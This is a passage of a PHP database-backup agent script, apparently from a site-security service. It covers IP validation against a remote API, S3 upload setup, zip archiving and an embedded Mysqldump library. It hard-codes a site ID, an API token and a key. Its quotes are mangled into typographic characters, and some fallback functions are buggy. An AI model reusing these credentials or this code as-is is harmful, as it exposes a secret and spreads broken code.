$this->link->connect_errno, $this->link->connect_error); add_to_log( $error, ‘error in Mysql_New constructor’ ); if ( $exception_on_failure ) { throw new DB_Exception( $this->link->connect_error, $this->link->connect_errno ); } else { die_enc_db($error); } } } function Mysql_New() { $this->__construct(); } function _generic_error_check( $result, $handle_func = ”, $title = null ) { if ( !function_exists($handle_func) ) { $handle_func = ‘die_enc_db’; } if ( !$result ) { $handle_func( sprintf(‘mysqli_query_error:%d:%s’, $this->link->errno, $this->link->error), $title ); return true; } // elseif ( !$this->_num_rows( $result ) ) { // $handle_func(‘zero_rows’); // return true; // } return false; } function error_no() { return $this->link->errno; } function error_str() { return $this->link->error; } function _query( $sql, $link = null ) { if ( is_null($link) ) $link = $this->link; if (!is_object($link)) return null; if ( $this->buffered ) { return $link->query($sql); } else { return $link->query($sql, MYSQLI_USE_RESULT); } } function _rows_affected( $query ) { # RJN 22382 8/17/2017 # if the update has already executed, # then $query gets assigned the rows_affected as output. # so, return that. otherwise, poke the object for it. if (!is_object($query)) return $query; else return $query->rowCount(); } function _escape_string( $string ) { return $this->link->escape_string( $string ); } function _fetch_row( $res ) { if (!is_object($res)) return null; return $res->fetch_row(); } function _fetch_assoc( $res ) { if (!is_object($res)) return null; return $res->fetch_assoc(); } function _fetch_array( $res ) { if (!is_object($res)) return null; return $res->fetch_array(); } function _num_rows( $res ) { if (!is_object($res)) return null; return $res->num_rows; } function _insert_id( $link = null ) { if (is_null($link)) $link = $this->link; if (!is_object($link)) return null; return $link->insert_id; } function _close() { if ( $this->result_set !== null ) { $this->result_set->close(); // does not return anything $this->result_set = null; } return true; } } /** * @todo */ class wPDO { var $link; function __construct() { die_enc_db(‘pdo_not_implemented’); } function wPDO() { $this->__construct(); } } class DB_Exception extends Exception { // Redefine the exception so message isn’t optional public function __construct($message, $code = 0, Exception $previous = null) { // some code // make sure everything is assigned properly if (version_compare(PHP_VERSION, ‘5.3.0’, ‘>=’)) { parent::__construct($message, $code, $previous); } else { parent::__construct($message, $code); // in PHP 5.2, Fatal Error on third param… } } // custom string representation of object public function __toString() { return __CLASS__ . “: [{$this->code}]: {$this->message}\n”; } } # Database – END # Utilities – START if ( version_compare( PHP_VERSION, ‘5.1.0’, ‘>=’ ) ) { date_default_timezone_set(‘America/New_York’); } define(‘DEBUG’, false); define(‘COMPACT_XFER_FMT’, true); define(‘VERSION’, ‘0.5.0’); define(‘RELEASE’, false); error_reporting(E_ERROR | E_PARSE); ini_set(‘display_errors’, false); ini_set(‘html_errors’, false); if (!function_exists(‘json_encode’)) { function json_encode($object) { return _json_encode_internal($object); } } header(‘Content-Type: text/plain’); $_SITEID = ‘36148493’; $_TOKEN = ‘f7d6c2124caff31a2809b69647517a6c’; $_UNIQUE = ‘df1bf5b30058f3a146a74d12c4cd022b’; // New params used to support Generic DB $_PLATFORM = ‘other’; $_FEATURECODE = ‘backup_db’; $db_structure_descriptor_file = ‘db-structure-descriptor.json’; $descriptor_ext = ‘-descriptor’; $backup_file_name = ‘database_backup.sql’; $_UPDATE_ID = isset( $_GET[ ‘update_id’ ] ) ? $_GET[ ‘update_id’ ] : null; /** ******************************************************************************************** * First thing: always need to check if we can continue with the script by validating the IP. * * ****************************************************************************************** **/ {{ $IPs = get_ip(); add_to_log( __FILE__, ‘IP Check started in’); add_to_log( date( DATE_ATOM, time()), ‘IP Check started at’); add_to_log( $IPs, ‘The following IPs will be tested’); $ip_validated = false; foreach( $IPs AS $IP ) { $payload = array( ‘site_id’ => $_SITEID, ‘ip’ => $IP ); $raw_response = mapi_post( $_TOKEN, ‘validate_ip’, $payload ); // check for curl errors before anything else. // curl not available at all? Too bad… if ( $CURL_INIT_ERR !== false ) { add_to_log( $CURL_INIT_ERR, ‘CURL INIT Error in check IP’ ); break; } // if it errored out, the HTTP connection failed and we cannot proceed if ( $CURL_MAPI_ERR !== false ) { add_to_log( $CURL_MAPI_ERR, ‘CURL MAPI Error in check IP’ ); break; } $ip_check_response = json_decode( $raw_response, true ); // Only continue if IP is validated, and stop otherwise. if ( !isset( $ip_check_response[‘responses’][0][‘data’][‘valid’] ) || $ip_check_response[‘responses’][0][‘data’][‘valid’] != 1 ) { // nothing here – will retry the next IP, if exists } // Only need one successful IP validation to continue, otherwise – try other IPs else { $ip_validated = true; break; } } // If IP did not validate and no other CURL errors reported if ( !$ip_validated && !( $CURL_INIT_ERR || $CURL_MAPI_ERR ) ) { $error = array( “allowed_ip” => 0, ); add_to_log($error, ‘error in check_ip()’); // output the log echo_enc(); echo json_encode( $error ); exit; } }} /** * Reusable function to init path to where to bullet will go */ function get_bullet_location() { // [27761] From now on, change in bullet placement: it will go into ./tmp instead of just . // Therefore, we’ll default to jumping up one level. $extradir = ‘..’ . DIRECTORY_SEPARATOR; $localdir = dirname(__FILE__) . DIRECTORY_SEPARATOR; // put them together into a real path and avoid dozen repeated concatenations $localdir = realpath( $localdir . $extradir ) . DIRECTORY_SEPARATOR; return $localdir; } /** * Function to take care of deciding where to get the DB creds from, based on the platform param */ function init_DB_creds_based_on_platform() { global $_PLATFORM; // Get DB creds switch( $_PLATFORM ) { case ‘wordpress’: import_WP_creds(); break; case ‘joomla’: import_Joomla_creds(); break; case ‘other’: default: import_Generic_creds(); break; } } /** * Function will submit site and feature to s3 init and attempt to get the single use id */ function handle_s3_init( $die_when_complete = false ) { global $_TOKEN, $_SITEID, $_FEATURECODE, $_CLIENTID, $_ENCRYPT_USE_CIPHER, $_ENCRYPT_USE_CIPHER_KEY, $_ENCRYPT_USE_CIPHER_IV; $params = array( ‘site_id’ => $_SITEID, ‘feature_code’ => $_FEATURECODE, ); $_CLIENTID and $params[ ‘client_id’ ] = $_CLIENTID; if( CRYPTOR === OPENSSL ) { $params[ ‘ciphers’ ] = openssl_get_cipher_methods(true); } else { $params[ ‘ciphers’ ] = mcrypt_list_algorithms(); } $init = mapi_post( $_TOKEN, ‘s3_init’, $params, LOG_MAPI_REQUEST ); $single_id = null; $error = false; do { if ( !$init ) { $error = ‘no-response-s3_init’; break; } $iobj = @json_decode($init); if ( !$iobj ) { $error = ‘failed-json_decode-s3_init’; break; } if ( $iobj->status != ‘ok’ || $iobj->forceLogout ) { $error = “failed-s3_init:status={$iobj->status},forceLogout=”.($iobj->forceLogout?1:0); break; } if ( $iobj->newToken && $iobj->newToken != $_TOKEN ) { $_TOKEN = $iobj->newToken; add_to_log($_TOKEN, ‘updated $_TOKEN in s3_init’); } if ( !$iobj->responses || !is_array($iobj->responses) || !count($iobj->responses) ) break; $response = $iobj->responses[0]->data; $single_id = $response->queue_id; if ( $response->cipher != $_ENCRYPT_USE_CIPHER ) { $_ENCRYPT_USE_CIPHER = $response->cipher; add_to_log($_ENCRYPT_USE_CIPHER, ‘updated Cipher in s3_init’); } // s3_init returns Key value base64-encoded $key = base64_decode( $response->cipher_key ); if ( $key != $_ENCRYPT_USE_CIPHER_KEY ) { $_ENCRYPT_USE_CIPHER_KEY = $key; add_to_log( obfuscate( $response->cipher_key ), ‘updated Cipher Key in s3_init’); } // s3_init returns IV value url-encoded $iv = urldecode( $response->cipher_iv ); if ( $iv != $_ENCRYPT_USE_CIPHER_IV ) { $_ENCRYPT_USE_CIPHER_IV = $iv; add_to_log( obfuscate( $response->cipher_iv ), ‘updated Cipher IV in s3_init’); } } while (0); if ( $die_when_complete ) { $response = array( ‘response’ => ‘smart_single_download_id’, ‘smart_single_download_id’ => $single_id ); if ( $error ) { $response[ ‘error’ ] = $error; } echo_enc(); // output log die_enc_json( $response ); // This is the expected die() returning JSON response to API. No changes needed. } else { return $single_id; } } function lock_the_bullet() { $bytes = file_put_contents( get_bullet_lock_path(), time() ); add_to_log( $bytes, ‘lock_the_bullet: bytes written’); return $bytes; } function unlock_the_bullet() { $status = unlink( get_bullet_lock_path() ); add_to_log( $status ? ‘success’:’failure’, ‘unlock_the_bullet: status’); return $status; } function bullet_is_locked() { $MAX_LOCK_TIME_SECONDS = 60; $path = get_bullet_lock_path(); // no file – no lock if ( !file_exists( $path ) ) { add_to_log( ‘not locked (no lock file)’, ‘bullet_is_locked check:’); return false; } else { $lock_time = (int) file_get_contents( $path ); $current_time = time(); // automatically drop lock if more than $MAX_LOCK_TIME_SECONDS elapsed since it was locked // (in case script hungs up – we would like to have an option to restart) $is_still_locked = $current_time – $lock_time < $MAX_LOCK_TIME_SECONDS ? true : false; add_to_log( "current: {$current_time}, locked at: {$lock_time}, diff: ".($current_time - $lock_time).", still locked: ".($is_still_locked?'Yes':'No'), 'bullet_is_locked check time:'); return $is_still_locked; } } function get_bullet_lock_path() { $path = __FILE__ . '.lock'; add_to_log( $path, 'get_bullet_lock_path:'); return $path; } function process_backup_schemas( $_SCHEMAS, $exception_on_failure = false ) { $db = getDbObj( $exception_on_failure ); // Schemas not specified - get all available if ( $_SCHEMAS === true ) { $_SCHEMAS = array(); $result_set = $db->_query( “SHOW DATABASES” ); if ($db->_generic_error_check($result_set)) { add_to_log( $result_set, ‘show-databases-error’ ); update_scan_on_error( ‘BACKUP_DB_ERR_SCHEMAS’, array( ‘SHOW DATABASES’ => $result_set ) ); } while( $db_row = $db->_fetch_assoc( $result_set ) ) { if(!in_array( $db_row[‘Database’], [‘information_schema’,’performance_schema’, ‘mysql’ ] ) ) { $_SCHEMAS[] = $db_row[ ‘Database’ ]; } } $db->_close(); } // single schema or JSON of muptple schemas else if ( is_string( $_SCHEMAS ) ) { $test_json = json_decode( $_SCHEMAS, true ); // JSON decode with no errors if ( json_last_error() === JSON_ERROR_NONE ) { $_SCHEMAS = $test_json; } // must be a single schema name else { $_SCHEMAS = array( $_SCHEMAS ); } } else if ( is_array( $_SCHEMAS ) && count( $_SCHEMAS ) ) { // no changes needed here } // unexpect format else { add_to_log( $_SCHEMAS, ‘schemas-format-error’ ); update_scan_on_error( ‘BACKUP_DB_ERR_SCHEMAS’, array( ‘$_SCHEMAS’ => $_SCHEMAS ) ); } return $_SCHEMAS; } function cleanup_insufficient_priveleges( &$errors_array ) { foreach( $errors_array AS $index => $issue ) { // If error is about some SP created by another user – skip it? // App if ( stripos( $issue, ‘ privileges to SHOW CREATE ‘ ) !== false ) { add_to_log( ‘‘ . $issue . ‘‘, ‘Skipping DB object we have no access to.’ ); unset( $errors_array[ $index ] ); } } } function set_character_locale( $locale_value = “en_US.UTF-8″ ) { // test if we can set UTF-8 locale necessary for clean DB queries // Making it optional… Look at it this way: // – If intl extension is not enabled, content is likely in English, and it won’t matter if we couldnt’t setlocale. // – If intl extension is enabled, then setlocale will likely work. $locale_set = setlocale( LC_CTYPE, $locale_value ); add_to_log( $locale_set ? ‘Success’ : ‘Fail’ , ‘Attempted to setlocale() with UTF-8’ ); if ( $locale_set === false ) { // check if intl extension cannot be loaded – that would be a good reason $intl_loaded = extension_loaded( ‘intl’ ); add_to_log( $intl_loaded ? ‘Yes’ : ‘No, and nothing we can do (dl() is removed as of php 5.3). ¯\_(ツ)_/¯’ , ‘Is intl extension loaded?’ ); } return $locale_set; } function get_foreign_key_checks() { $db = getDbObj(); $result_set = $db->_query( ‘select @@foreign_key_checks’ ); $return = null; if ( ($result_set_row = $db->_fetch_assoc( $result_set )) !== false ) { if ( isset($result_set_row[ ‘@@foreign_key_checks’ ]) ) { $return = (int) $result_set_row[ ‘@@foreign_key_checks’ ]; } } add_to_log( $return, ‘get_foreign_key_checks’ ); $db->_close(); return $return; } function set_foreign_key_checks( $value ) { $db = getDbObj(); $result_set = $db->_query( ‘SET FOREIGN_KEY_CHECKS=’ . (int) $value ); add_to_log( json_encode($result_set), ‘set_foreign_key_checks to ‘ . $value ); $db->_close(); } // Original flow continues… $_buffer = ”; if (RELEASE) { $_SUPER =& $_POST; } else { $_SUPER =& $_REQUEST; } function getSuper( $key, $default = null ) { global $_SUPER; if (array_key_exists($key, $_SUPER)) { return $_SUPER[$key]; } return $default; } function echo_enc() { global $_buffer, $_LOG; if ( $_LOG != ” ) { send_email( $_LOG ); } $_buffer .= join(func_get_args()); } function die_enc($str = ”, $title = null) { global $_buffer, $_LOG, $_SAVE_LOG; $_SAVE_LOG = true; $_buffer .= $str; if ( $title !== null ) { add_to_log( $str, $title ); } if ( $_LOG != ” ) { send_email( $_LOG ); } output_clean(); exit; } function die_enc_json( $array = array() ) { // log the final data piece before script dies add_to_log( $array, ‘die_enc_json TERMINATION’ ); // save db scan log echo_enc(); // output transmission echo json_encode( $array ); exit; } /** * @todo: encryption here */ function output_clean() { global $_buffer; $to_output = $_buffer; // <--- right there, that's where we need some encryption echo $to_output; } function delete_all_directory_files( $fileloc, $ext = 'csv' ) { if ( is_array( $ext ) ) { $ext = implode( ',', $ext ); $extant = glob($fileloc . DIRECTORY_SEPARATOR . '*.{' . $ext . '}', GLOB_BRACE ); // Curly brace is a part of GLOB_BRACE syntax and has to be preserved as is. } else { $extant = glob($fileloc . DIRECTORY_SEPARATOR . "*.{$ext}" ); // Here, curly is just a wrapper for PHP varaible - no special glob meaning. } // count how many were deleted $count_found = count($extant); $count_deleted = 0; if ( $count_found > 0 ) { foreach ( $extant as $exf ) { if( @unlink($exf) ) { $count_deleted++; } } } return $count_found === $count_deleted; } function update_scan_on_error( $error_code, $error_message, $terminate = true ) { global $_TOKEN, $_SITEID, $_CLIENTID, $_UPDATE_ID, $_FEATURECODE, $_SAVE_LOG; if ( is_array( $error_message ) ) { $error_message = json_encode( $error_message ); } // prepare static params for s3 call and add dynamic ones later $s3_params = array( ‘site_id’ => $_SITEID, ‘client_id’ => $_CLIENTID, ‘update_id’ => $_UPDATE_ID, ‘feature_code’ => $_FEATURECODE, ‘status’ => ‘error’, ‘error_code’ => $error_code, ‘error_message’ => $error_message, ); $_SAVE_LOG = true; // log failed scans for debugging $mapi_response = mapi_post( $_TOKEN, ‘s3_update’, $s3_params ); if ( $terminate ) { die_enc(‘error’); // API will be updated and bullet will stop execution. This function is a handle for abnormal termination. } return $mapi_response; // in case we need to look into it } // These checks, if failed, will abnormally terminate our execution. // Normally we would call MAPI to update API with error, but if MAPI itself is unreachable, then, welp… log and die. function check_and_terminate_on_mapi_errors() { global $CURL_INIT_ERR, $CURL_MAPI_ERR; // Edge case – curl not available, so can’t even eval the IP if ( $CURL_INIT_ERR ) { add_to_log( $CURL_INIT_ERR, ‘cURL Init Failed’ ); $error = array( ‘CURL_INIT_ERR’ => 0 ); die_enc_json( $error ); } // This is in edge case in prod (Prod MAPI/API are down?) and common case in stage (new domain being tested not whitelisted) if ( $CURL_MAPI_ERR ) { add_to_log( $CURL_MAPI_ERR, ‘cURL MAPI Failed’ ); $error = array( ‘CURL_MAPI_ERR’ => 0 ); die_enc_json( $error ); } } /** * Reusable wrapper around list_tables call that does extra processing */ function process_list_tables() { global $_PLATFORM; // For WP and Joomla, since we know the prefix, limit tables we want to pull // For generic we’ll pull everything (legacy logic) $prefix = null; if ( in_array( $_PLATFORM, [‘wordpress’,’joomla’] ) && DB_PREFIX ) { $prefix = DB_PREFIX; } $db = getDbObj(); $tables = $db->list_tables($prefix); $t_out = array(); $t_out[‘prefix’] = DB_PREFIX; if ( is_array( $tables ) && count( $tables ) ) { foreach ( $tables as $table ) { $table_name = $table[‘info’][‘Name’]; // restore original WordPress logic – pull only 3 specific tables if ( $_PLATFORM == ‘wordpress’ && DB_PREFIX ) { $tables_to_return = array( DB_PREFIX.’users’, DB_PREFIX.’posts’, DB_PREFIX.’comments’ ); if ( !in_array( $table_name, $tables_to_return ) ) { continue; } } if (isset($table[‘info’][‘last_id’])){ $t_last_id = $table[‘info’][‘last_id’]; }else{ $t_last_id = 0; } // process columns and their types $cols = array(); foreach( $table[‘cols’] AS $key => $column ) { $cols[ $key ] = (string) $column[ ‘Type’ ]; } // put together fields we’re interested in $t_out[‘tables’][ $table_name ] = array( ‘rows’ => $table[‘info’][‘Rows’], ‘idcol’ => $table[‘idcol’], ‘last_id’ => $t_last_id, ‘avg_row_len’ => $table[‘info’][‘Avg_row_length’], ‘all_data_len’ => $table[‘info’][‘Data_length’], ‘engine’ => $table[‘info’][‘Engine’], ‘columns’ => $cols, ); } return $t_out; } else { return false; } } /** * Reduces chunk size for server with low memory */ function reduce_chunk_size_on_low_memory( $reduction_multipler = 10 ) { global $_CHUNK_SIZE; $original_size = (int) $_CHUNK_SIZE; // see if server memory limit is not too small for our schunk….. $memory_limit_str = ini_get(‘memory_limit’); add_to_log( $memory_limit_str, ‘Detected memory_limit’); if ( !empty($memory_limit_str) && preg_match( ‘/([\d]+)([MG])/’, $memory_limit_str, $matches ) ) { // …. downsize chunk size if memory is 32M or lower if( isset($matches[1]) && is_numeric($matches[1]) && (int)$matches[1] <= 32 && isset($matches[2]) && $matches[2] == 'M' ) { $_CHUNK_SIZE = (int) ($_CHUNK_SIZE / $reduction_multipler); } } add_to_log( $_CHUNK_SIZE . ( $original_size != $_CHUNK_SIZE ? " (reduced from {$original_size})" : "" ), "Chunk Size"); } function _decode_compact_data_format( $pairs ) { if (!is_array($pairs)) { if (!( is_string($pairs) && strpos($pairs, '=') != false )) { // 0 is also bad so skip that too return array(); } $pairs = array($pairs); } $trow = array(); if (count($pairs)) { foreach ($pairs as $upair) { list($uk, $uv) = explode('=', $upair, 2); if (strlen($uv)) { if (!($uv[0] == '@' && is_numeric(substr($uv, 1)))) { $uv = base64_decode($uv); } else { $uv = substr($uv, 1); } } $trow[$uk] = $uv; } } return $trow; } function _json_encode_internal($object) { switch (true) { case is_string($object): return '"' . str_replace('"', '\\"', $object) . '"'; case is_numeric($object): case is_float($object): case is_int($object): return $object; case is_bool($object): return $object ? 'true' : 'false'; case is_null($object): return 'null'; case is_array($object): $km = false; $keys = array(); $values = array(); for( $int = 0, reset($object); list($key, $value) = each($object); ++$int) { $keys[] = $k = _json_encode_internal((string)$key); if ( !( $k === $key || $key == $int ) ) $km = true; $values[] = _json_encode_internal($value); } if ( count($keys) != count($values) ) { update_scan_on_error( 'ENCODING_FAILED', 'error_bad_counts_json_int' ); } $kv = $values; if ( $km ) { for ($i = 0; $i < count($values) && $kv[$i] = "{$keys[$i]}:{$values[$i]}"; ++$i); } $d = $km ? 123 : 91; return chr($d) . join(',', $kv) . chr($d + 2); case is_object($object): return _json_encode_internal(get_object_vars($object)); default: update_scan_on_error( 'ENCODING_FAILED', 'error_bad_vtype_json_int' ); } } if ( !function_exists('file_get_contents') ) { function file_get_contents($filename) { if ( !file_exists($filename) ) { return null; } $fp = fopen('r', $filename); $contents =''; while ( !feof($fp) ) { if ( ($line = fread($fp, 8192)) !== false ) { $contents .= $line; } } fclose($fp); return $contents; } } if ( !function_exists('file_put_contents') ) { define('FILE_APPEND', 8); function file_put_contents($filename, $contents, $flags = 0) { $open = 'wb'; if ( $flags & FILE_APPEND ) { $open = 'ab'; } $fp = fopen($filename, $open); $written = fwrite($fp, $conents); fclose($fp); return $written; } } function myErrorHandler($errno, $errstr, $errfile, $errline, $errcontext='') { throw new ErrorException($errstr, 0, $errno, $errfile, $errline); } # Utilities - END # Zip - START function archive_files( $files, &$target, $root = null, $cap = 0 ) { add_to_log( 'start', 'archive_files' ); if ( !is_array($files)) { return false; } $root = $root ? $root : $_SERVER['DOCUMENT_ROOT']; $root = realpath($root) . '/'; // keep slash attached to the root path and not the file // add_to_log( $root, 'archive_files 1' ); foreach ( $files as &$file ) { $file = realpath($file); } if (!( $target_dir = realpath(dirname($target)) )) { return false; } $target = $target_dir . DIRECTORY_SEPARATOR . basename($target); // add_to_log( $target, 'archive_files 2' ); DEBUG && var_dump(file_exists($target), is_dir($target), $target_dir, $target); if ( strcasecmp(substr($target, -4), '.zip') ) { if ( !is_dir($target) ) { if ( !@mkdir($target, 0700, true) ) { add_to_log( 'mkdir failed!', 'archive_files 2x' ); return false; } } $nt = $target . DIRECTORY_SEPARATOR . str_replace(array('.',' '), '', microtime()) . '.zip'; } elseif ( file_exists($target) ) { if ( !is_dir($target) && !unlink($target) ) { $nt = $target . '_' . str_replace(array('.',' '), '', microtime()) . '.zip'; } else { $nt = $target . DIRECTORY_SEPARATOR . str_replace(array('.',' '), '', microtime()) . '.zip'; } } // add_to_log( $nt, 'archive_files 3' ); if ( isset($nt) && !empty($nt) ) { // add_to_log( file_exists($nt), 'archive_files 3g' ); if ( file_exists($nt) ) { if ($cap > 20 ) { // I mean, what are the odds? It’s microtime()! return false; } return archive_files($files, $target, $root, $cap + 1); } $target = $nt; } // add_to_log( ‘I made it here try #’. $cap, ‘archive_files 4’ ); // if (class_exists(‘ZipArchive’, false)) { // add_to_log( ‘Send to ZA’, ‘archive_files 5’ ); // return archive_files_ZA( $files, $target, $root ); // } add_to_log( ‘Send to CLI’. $cap, ‘archive_files 5’ ); $result = archive_files_CLI( $files, $target, $root ); return $result; } function archive_files_ZA( $files, $target, $root ) { add_to_log( ‘good luck!’, ‘Attempting to use ZipArchive.’ ); $zip = new ZipArchive; $result = $zip->open($target, ZipArchive::CREATE); $add_file_status = array(); foreach ( $files as $file ) { $file_name = str_replace($root, ”, $file); $add_file_status[] = $zip->addFile( $file_name ); } $close_archive_status = $zip->close(); // Once done, remove original files as ZipArchive will not remove them after adding if ( $close_archive_status && !in_array( false, $add_file_status ) ) { foreach ( $files as $file ) { unlink( $file ); } } return true; # return $zip->numFiles > 0; } function archive_files_CLI( $files, $target, $root ) { set_error_handler( “myErrorHandler” ); // Fail Windows right here, but certain paths like /usr/bin/zip might be blocked so let that happen further down, within the try-catch if ( strtoupper(substr(PHP_OS, 0, 3)) == ‘WIN’ ) { return false; } $here = getcwd(); chdir($root); $zip_path = ‘/usr/bin/zip’; try { // Try using shell exec first file_exists( $zip_path ); // failing this will throw an exception before the actual sehll command is_executable( $zip_path ); $files_count = count( $files ); $files_running_total = 0; $files_group = array(); $files_group_count = 10; foreach ( $files as $file ) { $files_running_total++; // Try to group multiple files into single zip command for faster processing $files_group[] = $file; if ( count( $files_group ) >= $files_group_count || $files_running_total == $files_count ) { $files_group_str = ”; foreach( $files_group AS $file_in_group ) { $files_group_str .= ‘ ‘ . escapeshellarg($file_in_group); } $cmd = sprintf(“{$zip_path} -jqm1 %s %s”, escapeshellarg($target), $files_group_str); if ( function_exists(‘shell_exec’) ) { shell_exec( $cmd ); } else { throw new ErrorException( ‘shell_exec_not_available’ ); } // reset temp array after we zip each batch $files_group = array(); } } } catch (ErrorException $e) { // if shell exec is not supported we need to use ZipArchive instead add_to_log( $e->getMessage(), “Failed shell_exec for {$zip_path}.” ); archive_files_ZA( $files, $target, $root ); } restore_error_handler(); chdir($here); return true; } # Zip – END # Ifsnop\Mysqldump – START /** * PHP version of mysqldump cli that comes with MySQL. * * Tags: mysql mysqldump pdo php7 php5 database php sql hhvm mariadb mysql-backup. * * @category Library * @package Ifsnop\Mysqldump * @author Diego Torres * @license http://www.gnu.org/copyleft/gpl.html GNU General Public License * @link https://github.com/ifsnop/mysqldump-php * */ # Namespace commented out. # Reason: “PHP Fatal error: Namespace declaration statement has to be the very first statement or after any declare call in the script …” //namespace Ifsnop\Mysqldump; # Use statements commented out. # Reason: “PHP Warning: The use statement with non-compound name ‘Exception’ has no effect …” //use Exception; //use PDO; //use PDOException; /** * Class Mysqldump. * * @category Library * @author Diego Torres * @license http://www.gnu.org/copyleft/gpl.html GNU General Public License * @link https://github.com/ifsnop/mysqldump-php * */ class Mysqldump { // Same as mysqldump (1000000 is the default used by mysqldump shell). const MAXLINESIZE = 1000000; // List of available compression methods as constants. const GZIP = ‘Gzip’; const BZIP2 = ‘Bzip2’; const NONE = ‘None’; const GZIPSTREAM = ‘Gzipstream’; // List of available connection strings. const UTF8 = ‘utf8’; const UTF8MB4 = ‘utf8mb4’; /** * Database username. * @var string */ public $user; /** * Database password. * @var string */ public $pass; /** * Connection string for PDO. * @var string */ public $dsn; /** * Destination filename, defaults to stdout. * @var string */ public $fileName = ‘php://stdout’; // Internal stuff. private $tables = array(); private $views = array(); private $triggers = array(); private $procedures = array(); private $functions = array(); private $events = array(); private $dbHandler = null; private $dbType = “”; private $compressManager; private $typeAdapter; private $dumpSettings = array(); private $pdoSettings = array(); private $version; private $tableColumnTypes = array(); private $transformColumnValueCallable; private $infoCallable; /** * Database name, parsed from dsn. * @var string */ private $dbName; /** * Host name, parsed from dsn. * @var string */ private $host; /** * Dsn string parsed as an array. * @var array */ private $dsnArray = array(); /** * Keyed on table name, with the value as the conditions. * e.g. – ‘users’ => ‘date_registered > NOW() – INTERVAL 6 MONTH’ * * @var array */ private $tableWheres = array(); private $tableLimits = array(); /** * Constructor of Mysqldump. Note that in the case of an SQLite database * connection, the filename must be in the $db parameter. * * @param string $dsn PDO DSN connection string * @param string $user SQL account username * @param string $pass SQL account password * @param array $dumpSettings SQL database settings * @param array $pdoSettings PDO configured attributes */ public function __construct( $dsn = ”, $user = ”, $pass = ”, $dumpSettings = array(), $pdoSettings = array() ) { $dumpSettingsDefault = array( ‘include-tables’ => array(), ‘exclude-tables’ => array(), ‘compress’ => Mysqldump::NONE, ‘init_commands’ => array(), ‘no-data’ => array(), ‘reset-auto-increment’ => false, ‘add-drop-database’ => false, ‘add-drop-table’ => false, ‘add-drop-trigger’ => true, ‘add-locks’ => true, ‘complete-insert’ => false, ‘databases’ => false, ‘default-character-set’ => Mysqldump::UTF8, ‘disable-keys’ => true, ‘extended-insert’ => true, ‘events’ => false, ‘hex-blob’ => true, /* faster than escaped content */ ‘insert-ignore’ => false, ‘net_buffer_length’ => self::MAXLINESIZE, ‘no-autocommit’ => true, ‘no-create-info’ => false, ‘lock-tables’ => true, ‘routines’ => false, ‘single-transaction’ => true, ‘skip-triggers’ => false, ‘skip-tz-utc’ => false, ‘skip-comments’ => false, ‘skip-dump-date’ => false, ‘skip-definer’ => false, ‘where’ => ”, /* deprecated */ ‘disable-foreign-keys-check’ => true, ‘skip-procs-perm-error’ => false ); $pdoSettingsDefault = array( PDO::ATTR_PERSISTENT => true, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, ); // There’s a PHP bug: the following param might not be available (and we can’t access php.ini from here to do anyting about it) // https://bugs.php.net/bug.php?id=47224 if ( property_exists( ‘PDO’, ‘MYSQL_ATTR_INIT_COMMAND’ ) ) { $pdoSettingsDefault[ PDO::MYSQL_ATTR_INIT_COMMAND ] = “SET NAMES utf8”; } $this->user = $user; $this->pass = $pass; $this->parseDsn($dsn); // This drops MYSQL dependency, only use the constant if it’s defined. if (“mysql” === $this->dbType) { $pdoSettingsDefault[PDO::MYSQL_ATTR_USE_BUFFERED_QUERY] = false; } $this->pdoSettings = self::array_replace_recursive($pdoSettingsDefault, $pdoSettings); $this->dumpSettings = self::array_replace_recursive($dumpSettingsDefault, $dumpSettings); $this->dumpSettings[‘init_commands’][] = “SET NAMES “.$this->dumpSettings[‘default-character-set’]; if (false === $this->dumpSettings[‘skip-tz-utc’]) { $this->dumpSettings[‘init_commands’][] = “SET TIME_ZONE=’+00:00′”; } $diff = array_diff(array_keys($this->dumpSettings), array_keys($dumpSettingsDefault)); if (count($diff) > 0) { throw new Exception(“Unexpected value in dumpSettings: (“.implode(“,”, $diff).”)”); } if (!is_array($this->dumpSettings[‘include-tables’]) || !is_array($this->dumpSettings[‘exclude-tables’])) { throw new Exception(“Include-tables and exclude-tables should be arrays”); } // Dump the same views as tables, mimic mysqldump behaviour $this->dumpSettings[‘include-views’] = $this->dumpSettings[‘include-tables’]; // Create a new compressManager to manage compressed output $this->compressManager = CompressManagerFactory::create($this->dumpSettings[‘compress’]); } /** * Destructor of Mysqldump. Unsets dbHandlers and database objects. */ public function __destruct() { $this->dbHandler = null; } /** * Custom array_replace_recursive to be used if PHP < 5.3 * Replaces elements from passed arrays into the first array recursively. * * @param array $array1 The array in which elements are replaced * @param array $array2 The array from which elements will be extracted * * @return array Returns an array, or NULL if an error occurs. */ public static function array_replace_recursive($array1, $array2) { if (function_exists('array_replace_recursive')) { return array_replace_recursive($array1, $array2); } foreach ($array2 as $key => $value) { if (is_array($value)) { $array1[$key] = self::array_replace_recursive($array1[$key], $value); } else { $array1[$key] = $value; } } return $array1; } /** * Keyed by table name, with the value as the conditions: * e.g. ‘users’ => ‘date_registered > NOW() – INTERVAL 6 MONTH AND deleted=0’ * * @param array $tableWheres */ public function setTableWheres(array $tableWheres) { $this->tableWheres = $tableWheres; } /** * @param $tableName * * @return boolean|mixed */ public function getTableWhere($tableName) { if (!empty($this->tableWheres[$tableName])) { return $this->tableWheres[$tableName]; } elseif ($this->dumpSettings[‘where’]) { return $this->dumpSettings[‘where’]; } return false; } /** * Keyed by table name, with the value as the numeric limit: * e.g. ‘users’ => 3000 * * @param array $tableLimits */ public function setTableLimits(array $tableLimits) { $this->tableLimits = $tableLimits; } /** * Returns the LIMIT for the table. Must be numeric to be returned. * @param $tableName * @return boolean */ public function getTableLimit($tableName) { if (empty($this->tableLimits[$tableName])) { return false; } $limit = $this->tableLimits[$tableName]; if (!is_numeric($limit)) { return false; } return $limit; } /** * Parse DSN string and extract dbname value * Several examples of a DSN string * mysql:host=localhost;dbname=testdb * mysql:host=localhost;port=3307;dbname=testdb * mysql:unix_socket=/tmp/mysql.sock;dbname=testdb * * @param string $dsn dsn string to parse * @return boolean */ private function parseDsn($dsn) { if (empty($dsn) || (false === ($pos = strpos($dsn, “:”)))) { throw new Exception(“Empty DSN string”); } $this->dsn = $dsn; $this->dbType = strtolower(substr($dsn, 0, $pos)); // always returns a string if (empty($this->dbType)) { throw new Exception(“Missing database type from DSN string”); } $dsn = substr($dsn, $pos + 1); /* foreach (explode(“;”, $dsn) as $kvp) { $kvpArr = explode(“=”, $kvp); $this->dsnArray[strtolower($kvpArr[0])] = $kvpArr[1]; }*/ preg_match_all( ‘/(host|unix_socket|dbname)=([^;]+);?/’, $dsn, $dsn_matches ); foreach ($dsn_matches[1] as $index => $key) { // [1] will contain keys 